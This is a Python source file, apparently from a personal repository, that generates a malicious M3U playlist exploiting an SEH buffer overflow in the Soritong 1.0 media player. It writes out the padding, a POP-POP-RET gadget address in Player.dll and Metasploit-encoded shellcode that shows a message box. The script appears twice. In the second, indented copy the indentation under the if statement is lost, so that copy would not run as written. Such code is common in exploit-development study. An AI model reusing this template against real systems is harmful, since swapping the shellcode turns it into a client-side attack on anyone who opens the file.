synap5e/soritong_1_m3u_exploit.py

## soritong_1_m3u_exploit.py
#!/usr/bin/python
import os

# Soritong 1.0 Client side exploit (SEH)
# Author: Simon Pinfold

 #
 # windows/messagebox - 287 bytes
 # http://www.metasploit.com
 # Encoder: x86/shikata_ga_nai
 # VERBOSE=false, EXITFUNC=thread, TITLE=Check, TEXT=Code
 # Execution!, ICON=NO
 # Badchars = '\x00\xff\x0a\x0d'
 #
payload = ("\xdb\xde\xbf\x60\xd0\x21\x8d\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x42\x83\xc5\x04\x31\x7d\x14\x03\x7d\x74\x32\xd4\x54\x9f\x29"
"\xce\x13\x7b\xba\xc0\x09\x31\x35\x12\x67\x51\x31\x25\x47\x12"
"\x33\xca\x2c\x52\xa0\x59\x74\x92\x53\x23\x59\x29\x55\xe4\xd6"
"\x35\xef\xe7\xb0\x44\xde\xf7\xa2\x26\x6b\x6b\x01\x82\xe0\x31"
"\x75\x41\xa2\x91\xfd\x54\xa1\x69\xb7\x4e\xbe\x34\x68\x6f\x2b"
"\x2b\x5c\x26\x20\x98\x16\xb9\xd8\xd0\xd7\x88\xe4\xef\x84\x6e"
"\x24\x7b\xd2\xaf\x6a\x89\xdd\xe8\x9e\x66\xe6\x8a\x44\xaf\x6c"
"\x93\x0e\xf5\xaa\x52\xfa\x6c\x38\x58\xb7\xfb\x64\x7c\x46\x17"
"\x13\x78\xc3\xe6\xcc\x09\x97\xcc\x10\x68\xdb\xbf\x21\x43\x0f"
"\x36\xd4\x1a\x6d\x21\x99\x52\x7c\x5e\xf7\x82\x1f\x61\x07\xad"
"\xa9\xdb\xfc\xea\x45\x2d\x1c\x6c\x1d\xae\xf9\x3e\xc9\x41\xfe"
"\x41\xf6\xd7\x44\xb5\x61\x84\x2a\xe5\x30\x3c\x80\xd7\x9c\xd8"
"\x8e\x62\x92\x45\x3d\x04\x08\xa2\xcb\x9d\x57\xfc\x34\xc8\x93"
"\x88\x09\xa2\x20\x22\x2f\x0f\xeb\xb4\x2c\xab\x41\x53\x2d\x4c"
"\x9a\x5c\xc6\xd9\x3d\x83\x37\x75\xfd\xab\x52\xe6\x30\xf7\x15"
"\xb4\x16\x02\xaf\xa7\x3f\x63\xc1\x06\x98\x13\x7e\x3d\x6c\x8d"
"\xe8\x9d\xc9\x35\x8c\xb5\x92\xaa\x2a\x20\x24\xfc\x3b\xe6\x62"
"\xf1\xb2\x17\x5b\xdf\xaf\xe7\xcf\x8e\x7d\xf8\x20\x01\x42\x56"
"\x3e\x37\x4a")

buffer = 'A' * 260
buffer += "\x90\x90\xeb\x04"

buffer += '\xf8\x04\x01\x10' # Player.dll 0x100104f8 pop edi; pop esi; retn 0x0004
#this jumps us to 0x0012FC7C

buffer += '\x90' * 20
buffer += payload
buffer += 'A' * (30000 - len(buffer))

name = "file.m3u"
if os.path.exists(name):
        os.remove(name)
f = file(name, "w")
f.write(buffer)
f.close()
	#!/usr/bin/python
	import os

	# Soritong 1.0 Client side exploit (SEH)
	# Author: Simon Pinfold

	#
	# windows/messagebox - 287 bytes
	# http://www.metasploit.com
	# Encoder: x86/shikata_ga_nai
	# VERBOSE=false, EXITFUNC=thread, TITLE=Check, TEXT=Code
	# Execution!, ICON=NO
	# Badchars = '\x00\xff\x0a\x0d'
	#
	payload = ("\xdb\xde\xbf\x60\xd0\x21\x8d\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
	"\x42\x83\xc5\x04\x31\x7d\x14\x03\x7d\x74\x32\xd4\x54\x9f\x29"
	"\xce\x13\x7b\xba\xc0\x09\x31\x35\x12\x67\x51\x31\x25\x47\x12"
	"\x33\xca\x2c\x52\xa0\x59\x74\x92\x53\x23\x59\x29\x55\xe4\xd6"
	"\x35\xef\xe7\xb0\x44\xde\xf7\xa2\x26\x6b\x6b\x01\x82\xe0\x31"
	"\x75\x41\xa2\x91\xfd\x54\xa1\x69\xb7\x4e\xbe\x34\x68\x6f\x2b"
	"\x2b\x5c\x26\x20\x98\x16\xb9\xd8\xd0\xd7\x88\xe4\xef\x84\x6e"
	"\x24\x7b\xd2\xaf\x6a\x89\xdd\xe8\x9e\x66\xe6\x8a\x44\xaf\x6c"
	"\x93\x0e\xf5\xaa\x52\xfa\x6c\x38\x58\xb7\xfb\x64\x7c\x46\x17"
	"\x13\x78\xc3\xe6\xcc\x09\x97\xcc\x10\x68\xdb\xbf\x21\x43\x0f"
	"\x36\xd4\x1a\x6d\x21\x99\x52\x7c\x5e\xf7\x82\x1f\x61\x07\xad"
	"\xa9\xdb\xfc\xea\x45\x2d\x1c\x6c\x1d\xae\xf9\x3e\xc9\x41\xfe"
	"\x41\xf6\xd7\x44\xb5\x61\x84\x2a\xe5\x30\x3c\x80\xd7\x9c\xd8"
	"\x8e\x62\x92\x45\x3d\x04\x08\xa2\xcb\x9d\x57\xfc\x34\xc8\x93"
	"\x88\x09\xa2\x20\x22\x2f\x0f\xeb\xb4\x2c\xab\x41\x53\x2d\x4c"
	"\x9a\x5c\xc6\xd9\x3d\x83\x37\x75\xfd\xab\x52\xe6\x30\xf7\x15"
	"\xb4\x16\x02\xaf\xa7\x3f\x63\xc1\x06\x98\x13\x7e\x3d\x6c\x8d"
	"\xe8\x9d\xc9\x35\x8c\xb5\x92\xaa\x2a\x20\x24\xfc\x3b\xe6\x62"
	"\xf1\xb2\x17\x5b\xdf\xaf\xe7\xcf\x8e\x7d\xf8\x20\x01\x42\x56"
	"\x3e\x37\x4a")

	buffer = 'A' * 260
	buffer += "\x90\x90\xeb\x04"

	buffer += '\xf8\x04\x01\x10' # Player.dll 0x100104f8 pop edi; pop esi; retn 0x0004
	#this jumps us to 0x0012FC7C

	buffer += '\x90' * 20
	buffer += payload
	buffer += 'A' * (30000 - len(buffer))

	name = "file.m3u"
	if os.path.exists(name):
	os.remove(name)
	f = file(name, "w")
	f.write(buffer)
	f.close()